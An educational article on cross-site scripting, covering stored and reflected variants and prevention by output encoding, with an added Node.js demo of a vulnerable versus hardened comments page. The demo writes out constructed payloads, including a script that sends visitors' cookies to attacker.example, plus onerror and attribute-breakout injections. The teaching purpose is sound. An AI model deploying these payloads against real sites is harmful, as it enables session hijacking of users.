XSS, an acronym derived from Cross ‘X’ Site Scripting, refers to the injection of malicious scripts into a legitimate website or web application. Like SQL injection it is an injection attack, but its target is different: the injected script runs in the browsers of the application’s users, under the site’s own origin, so it is the users rather than the server that are directly compromised.
Most of the time the users are not even aware of the malicious script hiding behind an innocent-looking page. All it takes is for the user to visit the affected page (or, in the reflected variant, to follow a crafted link) and the script runs with their session. Depending on what the script does, it can read or modify anything the user can see on the page and, in the worst case, take over the user’s account.
How are webpages made?
A website as we see it is written in HTML, a mark-up language. In other words, everything we see is written inside tags, denoted by the < and > symbols. For example, to show bold text on a page all we have to do is write the text between the <b> and </b> tags. The browser parses the whole document as markup, which is why attacker-supplied text containing tags is treated as part of the page rather than as plain text.
How do XSS Attacks work?
Suppose a website does not sanitize user input (more precisely, does not encode it when writing it back into a page) and a perpetrator takes notice of that. He can now inject his own script into the website and wait for other users to fall into his trap. Such attacks are commonly used to steal visitors’ session cookies: each time a new visitor’s browser executes the script, the session cookie is sent to the perpetrator. Using the cookie, the perpetrator can pose as the user, since the cookie identifies the user’s session, and he is now able to do and see everything the user is entitled to. (A cookie marked HttpOnly cannot be read from script, but the injected code can still make requests on the user’s behalf from inside the page.)
Apart from stealing session cookies, the perpetrator can read and modify the page running in the browser and send HTTP requests to arbitrary destinations, including to the vulnerable site itself, carrying the user’s session.
The most common targets of such attacks are websites that let users share content: blogs, forums and social networks that let users post text, images and videos and message other users.
Types of XSS Attacks
Two types of XSS attack are usually distinguished. (A third, DOM-based XSS, arises when the page’s own client-side JavaScript writes untrusted data into the DOM; the two server-side variants are the subject here.)
• Stored XSS – Stored (or persistent) XSS is what we discussed above: the payload is saved by the application, for example in a comment, profile field or message, and served to every visitor who views that content. It is the more damaging of the two because no interaction beyond visiting the affected page is needed.
• Reflected XSS – Reflected XSS requires the victim to open a particular link. The payload travels in the request, typically in a URL parameter, and is echoed back into the response without encoding, which is one of the reasons why one must never click on unknown links.
How to Prevent XSS Attacks
As a user, it is almost impossible to recognise an affected website. You should still avoid clicking suspicious-looking links, which may carry a reflected payload, but keep in mind that a stored attack needs no link at all.
As a developer, it is your responsibility: the script runs under your site’s origin, with your users’ sessions. Both stored and reflected XSS come from untrusted input being written into a page without being encoded. The fix is to validate input where possible and, above all, to encode every untrusted value for the context it is written into (HTML body, attribute, JavaScript, URL) at the moment it is output.
In PHP, one way to do this is to run the value through filter_var() with FILTER_SANITIZE_FULL_SPECIAL_CHARS, which is equivalent to htmlspecialchars() with ENT_QUOTES: the characters <, >, &, " and ' are converted to HTML entities, so the browser displays them as text instead of parsing them. FILTER_SANITIZE_STRING, which strips tags (and encodes quotes) rather than escaping, is deprecated as of PHP 8.1; escaping is preferred because it preserves the user’s text and is easier to reason about. For WordPress there is also wp_kses(), which keeps only an allowlist of tags and attributes and strips everything else, including scripts.
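As an added example, not code from the original article or from Wordfence: a minimal server-rendered comments page in JavaScript (Node), first built by string concatenation and then with output encoding equivalent to htmlspecialchars() with ENT_QUOTES, which is what FILTER_SANITIZE_FULL_SPECIAL_CHARS applies. It shows both the mechanics described under “How do XSS Attacks work?” (a stored comment payload and a reflected search parameter landing in the page) and the prevention advice above, including why stripping tags by hand is not the same as encoding. The comment store, the payloads and the host attacker.example are constructed for the demonstration, and the scan that spots executable content is a simplification, not a browser parser.

```javascript
// Added example (not code from the original article): a minimal
// server-rendered comments page built by string concatenation
// (vulnerable) and the same page with output encoding (hardened).
// The comment store, the attacker's payloads and the collector host
// attacker.example are all constructed for this demonstration.

// Constructed stored payload: posted by the attacker as a blog comment.
// Any visitor whose browser runs it sends their cookies to the attacker
// (unless the cookies are HttpOnly, which hides them from document.cookie).
const STORED_PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?d='+document.cookie</script>";

// Constructed reflected payload: carried in a link such as
// /search?q=<payload>; the page echoes q into the results heading.
const REFLECTED_PAYLOAD = '"><img src=x onerror="alert(document.cookie)">';

// Constructed attribute-context payload: contains no '<' at all, so tag
// stripping leaves it untouched, yet it breaks out of a quoted attribute.
const ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

// Constructed comment "database": one honest comment, one from the attacker.
const COMMENTS = [
  { author: 'alice', text: 'Nice post!' },
  { author: 'mallory', text: STORED_PAYLOAD },
];

// Vulnerable: untrusted strings go straight into the markup.
function renderVulnerable(query, comments) {
  let html = `<h2>Results for: ${query}</h2>\n<ul>\n`;
  for (const c of comments) html += `<li><b>${c.author}</b>: ${c.text}</li>\n`;
  return html + '</ul>\n';
}

// Equivalent of PHP's htmlspecialchars($s, ENT_QUOTES), which is what
// FILTER_SANITIZE_FULL_SPECIAL_CHARS applies: the five characters that can
// open a tag, end an attribute value or start an entity become entities,
// so the browser displays them as text instead of parsing them.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Tag stripping alone, the kind of sanitizer often written by hand:
// removes anything that looks like a tag and changes nothing else.
function stripTags(s) {
  return String(s).replace(/<[^>]*>/g, '');
}

// Hardened: the data is stored verbatim and encoded at output time, for
// the HTML context it lands in. This covers stored and reflected XSS
// alike: the payload is still in the database, it is just never parsed.
function renderHardened(query, comments) {
  let html = `<h2>Results for: ${escapeHtml(query)}</h2>\n<ul>\n`;
  for (const c of comments) {
    html += `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.text)}</li>\n`;
  }
  return html + '</ul>\n';
}

// A value inside a quoted attribute; `encode` is the sanitizer under test.
function renderSearchBox(q, encode) {
  return `<input name="q" value="${encode(q)}">`;
}

// Simplified scan, for the demonstration only (not a browser parser): walks
// every start tag, reads attribute names while honouring quoted values the
// way a browser does, and reports each place script could run: a <script>
// element or an on* event-handler attribute.
function findActiveContent(html) {
  const hits = [];
  const tagRe = /<([a-zA-Z][\w-]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"']+))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (tag === 'script') hits.push('<script>');
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const name = a[1].toLowerCase();
      if (name.startsWith('on')) hits.push(`${tag}[${name}]`);
    }
  }
  return hits;
}

// Runs the four cases and returns where script could execute in each.
function demo() {
  return {
    vulnerable: findActiveContent(renderVulnerable(REFLECTED_PAYLOAD, COMMENTS)),
    hardened: findActiveContent(renderHardened(REFLECTED_PAYLOAD, COMMENTS)),
    strippedAttr: findActiveContent(renderSearchBox(ATTR_PAYLOAD, stripTags)),
    escapedAttr: findActiveContent(renderSearchBox(ATTR_PAYLOAD, escapeHtml)),
  };
}

console.log(demo());
```

Run it with node; the printed object lists, for each rendering, the tags where script could execute: the concatenated page carries both the reflected img[onerror] and the stored <script>, the encoded page carries neither, and the attribute case shows that a payload with no tags at all survives stripping but not encoding. The escape shown covers the HTML body and quoted-attribute contexts only; a value written into a JavaScript string, a URL or a CSS property needs that context’s own encoding.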
For more details, refer to this article by Wordfence.